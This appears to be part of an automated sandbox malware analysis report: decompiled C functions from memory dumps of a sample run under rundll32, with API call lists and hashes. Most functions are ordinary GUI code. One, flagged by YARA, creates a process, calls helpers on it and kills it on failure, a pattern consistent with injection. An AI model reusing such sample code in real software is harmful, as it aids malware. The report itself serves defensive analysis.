                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DCB30 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027DCB30() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x2865748 = 0x409;
				 *0x286574c = 9;
				 *0x2865750 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x2865748 = _t14;
				}
				if(_t14 != 0) {
					 *0x286574c = _t14 & 0x3ff;
					 *0x2865750 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x286311c, 0x27dcc84, 8 << 2);
				if( *0x28630d4 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x2865755 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x2865754 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E027DCAB8(__eflags, _t49);
					}
				} else {
					_t20 = E027DCB18();
					if(_t20 != 0) {
						 *0x2865755 = 0;
						 *0x2865754 = 0;
						return _t20;
					}
					E027DCAB8(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E027D2D44(0x286311c, 0x20, 0x27dcc84);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x2865754 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x2865755 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x2865748; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x2865755 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                          0x027dcb3c
                          0x027dcb46
                          0x027dcb50
                          0x027dcb5a
                          0x027dcb61
                          0x027dcb63
                          0x027dcb63
                          0x027dcb6b
                          0x027dcb77
                          0x027dcb83
                          0x027dcb83
                          0x027dcb97
                          0x027dcba0
                          0x027dcc4f
                          0x027dcc54
                          0x027dcc59
                          0x027dcc60
                          0x027dcc65
                          0x027dcc67
                          0x027dcc6a
                          0x027dcc70
                          0x027dcc72
                          0x00000000
                          0x027dcc7a
                          0x027dcba6
                          0x027dcba6
                          0x027dcbad
                          0x027dcbaf
                          0x027dcbb6
                          0x00000000
                          0x027dcbb6
                          0x027dcbc3
                          0x027dcbd3
                          0x027dcbd5
                          0x027dcbda
                          0x027dcbdd
                          0x027dcbe3
                          0x027dcbe5
                          0x027dcbe7
                          0x00000000
                          0x027dcbe7
                          0x027dcbf3
                          0x027dcbf8
                          0x027dcbfe
                          0x027dcbfe
                          0x027dcc00
                          0x027dcc01
                          0x027dcc02
                          0x027dcc02
                          0x027dcc1e
                          0x027dcc24
                          0x027dcc29
                          0x027dcc2e
                          0x027dcc34
                          0x027dcc34
                          0x027dcc38
                          0x027dcc3b
                          0x027dcc41
                          0x027dcc43
                          0x00000000
                          0x00000000
                          0x027dcc45
                          0x027dcc48
                          0x027dcc48
                          0x027dcc49
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027dcc49
                          0x027dcc34
                          0x027dcc81
                          0x027dcc81
                          0x00000000

                          APIs
                          • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 027DCC24
                          • GetThreadLocale.KERNEL32 ref: 027DCB5A
                            • Part of subcall function 027DCAB8: GetCPInfo.KERNEL32(00000000,?), ref: 027DCAD1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocaleStringThreadType
                          • String ID:
                          • API String ID: 1505017576-0
                          • Opcode ID: bb95744d8ce3ff645ba43c21ed392deed711bdbdf75b8a959a902232885f7aa0
                          • Instruction ID: 768a52e939b3bc7240e8264e2fb574117e6ca3b3d5857a7ba5446583e4223d56
                          • Opcode Fuzzy Hash: bb95744d8ce3ff645ba43c21ed392deed711bdbdf75b8a959a902232885f7aa0
                          • Instruction Fuzzy Hash: F3313B65D81285CAD723D734B4197A637BAEB42304F84489BD5888F2C1DB798859C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02831AF4 Relevance: 6.1, APIs: 4, Instructions: 93windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02831AF4(int __eax, intOrPtr* __edx) {
				void* _t30;
				int _t33;
				int _t66;
				int _t70;
				void* _t77;

				_t57 = __edx;
				_t68 = __eax;
				if( *((intOrPtr*)(__eax + 0x180)) == 0) {
					return E0282EB9C(__eax, __edx);
				}
				_t65 =  *__edx;
				if( *__edx != 0x7b ||  *((intOrPtr*)(__eax + 0x30)) == 0) {
					L4:
					_t66 =  *_t57;
					_t30 = _t66 + 0xfffffece - 7;
					if(_t30 < 0) {
						_t57[3] = SendMessageA(_t57[2], _t66 + 0xbc00, _t57[1], _t57[2]);
					} else {
						if(_t30 + 0xffff4407 - 7 < 0) {
							SetTextColor(_t57[1], E027F7018( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x68)) + 0x18))));
							SetBkColor(_t57[1], E027F7018(E027F7C9C( *((intOrPtr*)(_t68 + 0x170)))));
							_t57[3] = E027F7CD8( *((intOrPtr*)(_t68 + 0x170)));
						} else {
							_t77 = _t66 -  *0x2865bac; // 0xc279
							if(_t77 != 0) {
								_t57[3] = CallWindowProcA( *(_t68 + 0x174),  *(_t68 + 0x180), _t66, _t57[1], _t57[2]);
							} else {
								_t57[3] = _t68;
							}
						}
					}
					_t33 =  *_t57;
					if(_t33 != 0xc) {
						goto L15;
					} else {
						return E0282D2F0(_t68, _t57[1], _t33, _t57[2]);
					}
				} else {
					_t33 = E0282E93C( *((intOrPtr*)(__eax + 0x30)),  *((intOrPtr*)(__edx + 4)), _t65,  *((intOrPtr*)(__edx + 8)));
					_t70 = _t33;
					_t57[3] = _t70;
					if(_t70 != 0) {
						L15:
						return _t33;
					}
					goto L4;
				}
			}








                          0x02831af8
                          0x02831afa
                          0x02831b03
                          0x00000000
                          0x02831bf0
                          0x02831b09
                          0x02831b0e
                          0x02831b34
                          0x02831b34
                          0x02831b3d
                          0x02831b40
                          0x02831b63
                          0x02831b42
                          0x02831b4a
                          0x02831b78
                          0x02831b92
                          0x02831ba2
                          0x02831b4c
                          0x02831ba7
                          0x02831bad
                          0x02831bd0
                          0x02831baf
                          0x02831baf
                          0x02831baf
                          0x02831bad
                          0x02831b4a
                          0x02831bd3
                          0x02831bd8
                          0x00000000
                          0x02831bda
                          0x00000000
                          0x02831be5
                          0x02831b16
                          0x02831b22
                          0x02831b27
                          0x02831b29
                          0x02831b2e
                          0x02831bf9
                          0x02831bf9
                          0x02831bf9
                          0x00000000
                          0x02831b2e

                          APIs
                          • SendMessageA.USER32(?,?,?,?), ref: 02831B5E
                            • Part of subcall function 027F7018: GetSysColor.USER32(?), ref: 027F7022
                          • SetTextColor.GDI32(?,00000000), ref: 02831B78
                          • SetBkColor.GDI32(?,00000000), ref: 02831B92
                            • Part of subcall function 027F7CD8: CreateBrushIndirect.GDI32(?), ref: 027F7D82
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Color$BrushCreateIndirectMessageSendText
                          • String ID:
                          • API String ID: 3173815208-0
                          • Opcode ID: 7d9b02369e0704d28c000a1f83fe8b663a5406d6d3a768ed7f8aba4ee20fc6e0
                          • Instruction ID: fd7b38b2f713a58ef76a8fb6003d910c31d0d8b07ab2ea446d94e0000dab956f
                          • Opcode Fuzzy Hash: 7d9b02369e0704d28c000a1f83fe8b663a5406d6d3a768ed7f8aba4ee20fc6e0
                          • Instruction Fuzzy Hash: E6318BBD600604DFCB52EE6DC8C8A96B7EAAF48710B088459E54DCF315EB34E841CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027FB738 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E027FB738(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E027F8188(_v8);
					_push(_t87);
					_push(0x27fb817);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E027FCB40( *((intOrPtr*)(_v8 + 0x58)));
					E027FB5B4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E027FCC40( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					E027F856C(_v8, _t69);
					_t59 =  *0x28638a0; // 0x41d0acc
					E027EB558(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x27fb81e);
					return E027F83C0(_v8);
				}
			}

















                          0x027fb739
                          0x027fb73b
                          0x027fb73e
                          0x027fb741
                          0x027fb748
                          0x027fb822
                          0x027fb74e
                          0x027fb751
                          0x027fb758
                          0x027fb759
                          0x027fb75e
                          0x027fb761
                          0x027fb76a
                          0x027fb77b
                          0x027fb786
                          0x027fb792
                          0x027fb79d
                          0x027fb7a2
                          0x027fb7b8
                          0x027fb7a4
                          0x027fb7ae
                          0x027fb7ae
                          0x027fb7c4
                          0x027fb7c9
                          0x027fb7e7
                          0x027fb7cb
                          0x027fb7d7
                          0x027fb7db
                          0x027fb7db
                          0x027fb7ef
                          0x027fb7f7
                          0x027fb7fc
                          0x027fb803
                          0x027fb806
                          0x027fb809
                          0x027fb816
                          0x027fb816

                          APIs
                            • Part of subcall function 027F8188: RtlEnterCriticalSection.KERNEL32(028658FC,00000000,027F6B6A,00000000,027F6BC9), ref: 027F8190
                            • Part of subcall function 027F8188: RtlLeaveCriticalSection.KERNEL32(028658FC,028658FC,00000000,027F6B6A,00000000,027F6BC9), ref: 027F819D
                            • Part of subcall function 027F8188: RtlEnterCriticalSection.KERNEL32(00000038,028658FC,028658FC,00000000,027F6B6A,00000000,027F6BC9), ref: 027F81A6
                            • Part of subcall function 027FCC40: GetDC.USER32(00000000), ref: 027FCC96
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000C), ref: 027FCCAB
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000E), ref: 027FCCB5
                            • Part of subcall function 027FCC40: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,027FB78B,00000000,027FB817), ref: 027FCCD9
                            • Part of subcall function 027FCC40: ReleaseDC.USER32(00000000,00000000), ref: 027FCCE4
                          • CreateCompatibleDC.GDI32(00000000), ref: 027FB78D
                          • SelectObject.GDI32(00000000,?), ref: 027FB7A6
                          • SelectPalette.GDI32(00000000,?,000000FF), ref: 027FB7CF
                          • RealizePalette.GDI32(00000000), ref: 027FB7DB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                          • String ID:
                          • API String ID: 979337279-0
                          • Opcode ID: 44d5bfa939219d9537dab496e402d3f108a8781078ea74c0324a978864df5f5a
                          • Instruction ID: 17a783e905f9889d771d7cb79a0918935d1d0b0c2d22b8d5f557363a15d24be1
                          • Opcode Fuzzy Hash: 44d5bfa939219d9537dab496e402d3f108a8781078ea74c0324a978864df5f5a
                          • Instruction Fuzzy Hash: CD313474A08658EFDB45EB68D985D5DB7FAEF48720B2281A5E904AB321C730EE40DF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02856AE4 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E02856AE4(void* __eax, void* __ebx, int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				struct tagRECT _v20;
				int _t30;
				int _t43;
				void* _t51;
				intOrPtr _t58;
				CHAR* _t61;
				int _t64;
				void* _t67;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t64 = __ecx;
				_t51 = __eax;
				E027D4598(_a12);
				_push(_t67);
				_push(0x2856bac);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffff0;
				OffsetRect( &_v20, 1, 1);
				E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a4);
				_t30 = E027D43A8(_a12);
				_t61 = E027D45A8(_a12);
				DrawTextA(E027F84EC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t30,  &_v20, _t64);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a8);
				_t43 = E027D43A8(_a12);
				DrawTextA(E027F84EC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t43,  &_v20, _t64);
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(0x2856bb3);
				return E027D40E8( &_a12);
			}











                          0x02856af2
                          0x02856af3
                          0x02856af4
                          0x02856af5
                          0x02856af6
                          0x02856af8
                          0x02856afd
                          0x02856b04
                          0x02856b05
                          0x02856b0a
                          0x02856b0d
                          0x02856b18
                          0x02856b29
                          0x02856b36
                          0x02856b44
                          0x02856b53
                          0x02856b60
                          0x02856b71
                          0x02856b7e
                          0x02856b91
                          0x02856b98
                          0x02856b9b
                          0x02856b9e
                          0x02856bab

                          APIs
                          • OffsetRect.USER32(?,00000001,00000001), ref: 02856B18
                          • DrawTextA.USER32(00000000,00000000,00000000,?), ref: 02856B53
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 02856B60
                          • DrawTextA.USER32(00000000,00000000,00000000,?), ref: 02856B91
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DrawOffsetRectText
                          • String ID:
                          • API String ID: 429220523-0
                          • Opcode ID: 75b82337afd0ee97b9ffe70840b33249dc860a1d009b62303dd7608648e3b203
                          • Instruction ID: ea72f802bf6514a27c50217fec6e5e63e61b9788f3bf0e29ad96bff032cfc61f
                          • Opcode Fuzzy Hash: 75b82337afd0ee97b9ffe70840b33249dc860a1d009b62303dd7608648e3b203
                          • Instruction Fuzzy Hash: C9215C716142196FDB42EF68DC84DABB3BEFF49320F454571BD24EB290DA71EC008A60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028271F4 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E028271F4(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E02826900(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0282677C(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0282677C(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E027D8C44(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E027D8B88(_a12, _t49);
				}
			}










                          0x028271fb
                          0x028271fd
                          0x028271ff
                          0x0282720a
                          0x00000000
                          0x0282728e
                          0x0282720e
                          0x0282721e
                          0x0282723b
                          0x02827240
                          0x02827245
                          0x02827252
                          0x02827252
                          0x02827220
                          0x02827227
                          0x02827234
                          0x02827234
                          0x02827259
                          0x00000000
                          0x0282725b
                          0x0282725e
                          0x0282726d
                          0x00000000
                          0x02827275

                          APIs
                          • GetMenuState.USER32(?,?,00000000), ref: 02827217
                          • GetSubMenu.USER32(?,?), ref: 02827222
                          • GetMenuItemID.USER32(?,?), ref: 0282723B
                          • GetMenuStringA.USER32(?,?,?,?,00000000), ref: 0282728E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$ItemStateString
                          • String ID:
                          • API String ID: 306270399-0
                          • Opcode ID: cb648b4827473fed9a536e1e97f0bef146852bbd4efffc2f85ec9b5f268f18b3
                          • Instruction ID: 9c7e80a4bd71e3ae1148af2034c7d64443318043bfa31d11e688548753ab8cf5
                          • Opcode Fuzzy Hash: cb648b4827473fed9a536e1e97f0bef146852bbd4efffc2f85ec9b5f268f18b3
                          • Instruction Fuzzy Hash: D111BE39602228AF9701EE6ECC84AAFB7FEDF49364B144429F80AD7240D6309D45CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2B80 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D2B80(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v20;
				char _v24;

				_v12 = 0xffffffff;
				if(E042D2B40(__ecx, _a4) != 0) {
					if(E042D2C40( &_v8,  &_v16) != 0) {
						if(E042D3270(_v8, _a4, _a8,  &_v24,  &_v20) == 1 && E042D37E0(_v8, _v16, _v24, _v20) == 1) {
							_v12 = GetProcessId(_v8);
						}
						if(_v12 == 0xffffffff) {
							TerminateProcess(_v8, 0);
						}
						CloseHandle(_v16);
						CloseHandle(_v8);
						return _v12;
					}
					return _v12;
				}
				return 0;
			}








                          0x042d2b86
                          0x042d2b9b
                          0x042d2bb6
                          0x042d2bdc
                          0x042d2c05
                          0x042d2c05
                          0x042d2c0c
                          0x042d2c14
                          0x042d2c14
                          0x042d2c1e
                          0x042d2c28
                          0x00000000
                          0x042d2c2e
                          0x00000000
                          0x042d2bb8
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e1da2ea824efcabf5825ea85d6c4d462b4847f951d9eec75517496f6534544c
                          • Instruction ID: d1846e2ee4c35c0f4dc05b502847fadf0e8cf93d16157e3eb4961ffb4d67ec89
                          • Opcode Fuzzy Hash: 2e1da2ea824efcabf5825ea85d6c4d462b4847f951d9eec75517496f6534544c
                          • Instruction Fuzzy Hash: F2211FBAE10109FBCB14EFE8D9849AEB778AF48215F108694E915E3241E635EA00DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281D3B8 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281D3B8(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _t36;
				intOrPtr _t38;
				intOrPtr _t53;

				_v9 = __edx;
				_v8 = __eax;
				_t36 =  *0x2865b58; // 0x41d1544
				if( *((intOrPtr*)(_t36 + 0x30)) != 0) {
					if( *((intOrPtr*)(_v8 + 0x94)) != 0) {
						L8:
						_t38 = _v8;
						 *((intOrPtr*)(_t38 + 0x94)) =  *((intOrPtr*)(_t38 + 0x94)) + 1;
						return _t38;
					}
					_v24 =  *((intOrPtr*)(_v8 + 0x30));
					_v20 = _v9;
					EnumWindows(E0281D338,  &_v24);
					if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x90)) + 8)) == 0) {
						goto L8;
					}
					_v24 = GetWindow(_v24, 3);
					if((GetWindowLongA(_v24, 0xffffffec) & 0x00000008) != 0) {
						_v24 = 0xfffffffe;
					}
					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x90)) + 8)) - 1;
					if(_t53 >= 0) {
						_v16 = _t53;
						do {
							SetWindowPos(E027EB1E0( *((intOrPtr*)(_v8 + 0x90)), _v16), _v24, 0, 0, 0, 0, 0x213);
							_v16 = _v16 - 1;
						} while (_v16 != 0xffffffff);
					}
					goto L8;
				}
				return _t36;
			}











                          0x0281d3be
                          0x0281d3c1
                          0x0281d3c4
                          0x0281d3cd
                          0x0281d3dd
                          0x0281d479
                          0x0281d479
                          0x0281d47c
                          0x00000000
                          0x0281d47c
                          0x0281d3e9
                          0x0281d3ef
                          0x0281d3fb
                          0x0281d40d
                          0x00000000
                          0x00000000
                          0x0281d41a
                          0x0281d42a
                          0x0281d42c
                          0x0281d42c
                          0x0281d43f
                          0x0281d443
                          0x0281d445
                          0x0281d448
                          0x0281d46b
                          0x0281d470
                          0x0281d473
                          0x0281d448
                          0x00000000
                          0x0281d443
                          0x0281d485

                          APIs
                          • EnumWindows.USER32(0281D338,0281DE90), ref: 0281D3FB
                          • GetWindow.USER32(0281DE90,00000003), ref: 0281D415
                          • GetWindowLongA.USER32(0281DE90,000000EC), ref: 0281D423
                          • SetWindowPos.USER32(00000000,0281DE90,00000000,00000000,00000000,00000000,00000213,0281DE90,000000EC,0281DE90,00000003,0281D338,0281DE90), ref: 0281D46B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$EnumLongWindows
                          • String ID:
                          • API String ID: 4191631535-0
                          • Opcode ID: 8655fa0d0f3f9516eea758dd10ec906880677037d0fa1698ab17deb48ddaa4d4
                          • Instruction ID: 20e7ff976a4a41e1658ff285a13a28ef25a250833bd1c78cd9869f0c73c9e4a4
                          • Opcode Fuzzy Hash: 8655fa0d0f3f9516eea758dd10ec906880677037d0fa1698ab17deb48ddaa4d4
                          • Instruction Fuzzy Hash: 0F21EC78900208EFDB15DBA8C989FADB7B9EB04314F6441A4E958EB2D1C374AE40CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F49B4 Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E027F49B4(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x2865668; // 0x27d0000
				 *0x28635d0 = _t6;
				_t8 =  *0x28635e4; // 0x27f49a4
				_t9 =  *0x2865668; // 0x27d0000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L027D6A3C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x2865668; // 0x27d0000
						_t20 =  *0x28635e4; // 0x27f49a4
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x28635c0);
				}
				_t13 =  *0x2865668; // 0x27d0000
				_t24 =  *0x28635e4; // 0x27f49a4
				_t22 = E027D6FCC(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E027F48F8(_a4, _a8));
				}
				return _t22;
			}














                          0x027f49bb
                          0x027f49c0
                          0x027f49c9
                          0x027f49cf
                          0x027f49d5
                          0x027f49dd
                          0x027f49df
                          0x027f49e2
                          0x027f49f0
                          0x027f49f2
                          0x027f49f8
                          0x027f49fe
                          0x027f49fe
                          0x027f4a08
                          0x027f4a08
                          0x027f4a1e
                          0x027f4a2b
                          0x027f4a3b
                          0x027f4a42
                          0x027f4a53
                          0x027f4a53
                          0x027f4a5e

                          APIs
                          • GetClassInfoA.USER32(027D0000,027F49A4,?), ref: 027F49D5
                          • UnregisterClassA.USER32(027F49A4,027D0000), ref: 027F49FE
                          • RegisterClassA.USER32(028635C0), ref: 027F4A08
                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 027F4A53
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Class$InfoLongRegisterUnregisterWindow
                          • String ID:
                          • API String ID: 4025006896-0
                          • Opcode ID: 754a6649b47e56f59b891558f9b1acddf5366326bb7c4faf121789afd139d264
                          • Instruction ID: 15d60ae16c55caf40cd5e2012a239915ea24d2a42de55fc797a4bec682d749d4
